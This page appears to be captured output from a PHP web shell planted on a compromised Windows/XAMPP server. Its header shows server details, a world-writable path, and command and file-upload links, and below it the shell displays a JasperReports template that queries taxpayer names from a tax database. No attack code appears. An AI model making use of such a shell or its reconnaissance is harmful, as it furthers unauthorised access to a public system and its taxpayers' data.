|
Server IP : 127.0.0.1 / Your IP : 127.0.0.1 Web Server : Apache/2.4.10 (Win32) OpenSSL/1.0.1i PHP/5.6.3 System : Windows NT WIN-R7LTCC7BPLI 6.3 build 9200 (Windows Server 2012 R2 Datacenter Edition) i586 User : GerbangSIPAD ( 0) PHP Version : 5.6.3 Disable Function : NONE MySQL : ON | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF Directory (0777) : C:/xampp5/htdocs/bhumie/report/SKKepalaDaerah/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?xml version="1.0" encoding="UTF-8"?>
<jasperReport xmlns="http://jasperreports.sourceforge.net/jasperreports" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://jasperreports.sourceforge.net/jasperreports http://jasperreports.sourceforge.net/xsd/jasperreport.xsd" name="SKOpIndividu_2" language="groovy" pageWidth="7200" pageHeight="595" columnWidth="7200" leftMargin="0" rightMargin="0" topMargin="0" bottomMargin="0" uuid="783c0163-acd4-483e-993f-566480c4f0a7">
<property name="ireport.zoom" value="1.0"/>
<property name="ireport.x" value="0"/>
<property name="ireport.y" value="0"/>
<parameter name="subjek_pajak_id" class="java.lang.String"/>
<queryString>
<![CDATA[SELECT NM_WP
FROM pbb.DAT_SUBJEK_PAJAK
WHERE SUBJEK_PAJAK_ID = $P{subjek_pajak_id}]]>
</queryString>
<field name="nm_wp" class="java.lang.String"/>
<background>
<band splitType="Stretch"/>
</background>
<detail>
<band height="18" splitType="Stretch">
<textField>
<reportElement uuid="34f2dad3-daf1-4f4e-b272-ed75f3b5e6a7" x="0" y="1" width="165" height="16"/>
<textElement>
<font fontName="Courier New"/>
</textElement>
<textFieldExpression><![CDATA[$F{nm_wp}]]></textFieldExpression>
</textField>
</band>
</detail>
</jasperReport>